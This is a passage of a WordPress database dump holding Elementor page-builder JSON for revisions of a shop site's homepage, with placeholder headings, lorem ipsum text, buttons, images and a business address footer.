More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8468,1483,'_elementor_page_assets','a:0:{}'),(8470,1484,'_elementor_edit_mode','builder'),(8471,1484,'_elementor_template_type','wp-page'),(8472,1484,'_elementor_version','3.7.7'),(8473,1484,'_wp_page_template','elementor_canvas'),(8474,1484,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8475,1484,'_elementor_page_assets','a:0:{}'),(8477,1485,'_elementor_edit_mode','builder'),(8478,1485,'_elementor_template_type','wp-page'),(8479,1485,'_elementor_version','3.7.7'),(8480,1485,'_wp_page_template','elementor_canvas'),(8481,1485,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 